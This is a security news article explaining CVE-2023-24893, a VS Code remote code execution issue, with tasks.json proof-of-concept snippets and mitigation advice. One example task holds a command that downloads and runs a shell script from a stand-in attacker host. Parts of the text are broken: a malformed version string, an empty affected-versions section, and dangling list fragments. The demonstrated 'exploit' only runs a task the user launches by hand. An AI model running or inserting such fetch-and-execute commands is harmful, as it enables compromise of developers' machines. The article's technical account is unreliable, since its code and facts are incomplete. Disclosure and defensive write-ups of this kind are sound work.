CVE CyberSecurity Database News

CVE-2023-24893 - Visual Studio Code Remote Code Execution Vulnerability Explained (With PoC)

Poster -

---

Introduction

In early 2023, Microsoft issued a critical security update addressing a severe vulnerability in Visual Studio Code (VS Code), tracked as CVE-2023-24893. This vulnerability allows an attacker to run their own code on your machine simply by getting you to open a malicious project or repository in VS Code. If you use VS Code for coding or reviewing third-party repositories, understanding CVE-2023-24893 is crucial for your security.

This article will break down how this bug works, how it’s exploited, give you real code examples, and point to official resources and fixes.

What is CVE-2023-24893?

CVE-2023-24893 is a Remote Code Execution (RCE) vulnerability found in Visual Studio Code due to improper handling of workspace files in .vscode folders. By luring a developer into opening a malicious project, an attacker can execute code on the victim’s system.

Root Cause

VS Code offers a powerful feature: workspace configuration via .vscode folders, including scripts, extensions suggestions, and settings. Unfortunately, there was insufficient validation of certain configuration files, like tasks.json and launch.json, which could be weaponized to execute arbitrary code without clear consent from the user.

Suppose an attacker sets up a GitHub repo with a crafted .vscode/tasks.json like this

// .vscode/tasks.json
{
  "version": "2..",
  "tasks": [
    {
      "label": "exploit-task",
      "type": "shell",
      "command": "curl http://attacker.com/shell.sh | bash"
    }
  ]
}

If you open the repo in VS Code and run the task (or if a vulnerable extension or auto-run setting triggers it), this will execute the shell command—fetching and running the attacker's script. The malicious code runs with your user privileges.

// .vscode/extensions.json
{
  "recommendations": [
    "malicious.pwned-extension"
  ]
}

If a user installs a malicious extension (trusting the recommendation), it could leverage the same vulnerability to escalate privileges or plant additional payloads.

A GitHub repository

- Adds the malicious .vscode/tasks.json as above.

Here’s a minimal reproducible PoC for testing (do not use for bad purposes)

// .vscode/tasks.json
{
  "version": "2..",
  "tasks": [
    {
      "label": "pwnd",
      "type": "shell",
      "command": "echo Exploit successful! > ~/exploit.txt"
    }
  ]
}

Open this folder in VS Code, then run the "pwnd" task from the terminal (Terminal > Run Task). Your ~/exploit.txt file is created—proving arbitrary commands can be executed.

Anyone opening untrusted projects or accepting workspace configuration files.

Software versions impacted:

Mitigation & Fix

Microsoft’s Response:  
Microsoft released patches in VS Code 1.76.1 (and later). They improved validation and added warnings when opening external configuration files.

Update VS Code to the latest version:

Official Download Link
2. Be cautious with third-party repositories—don’t blindly run tasks or install extensions unless you trust the source.

References

- Microsoft Security Advisory CVE-2023-24893
- VS Code 1.76.1 Release Notes
- Exploit write-up on GitHub

Final Notes

CVE-2023-24893 highlights the dangers of trusting workspace configurations in even familiar products like Visual Studio Code. Always update your tools, inspect unknown repository files, and be suspicious of anything that tries to run code or install extensions unexpectedly.

Timeline

Published on: 04/11/2023 21:15:00 UTC
Last modified on: 04/14/2023 15:13:00 UTC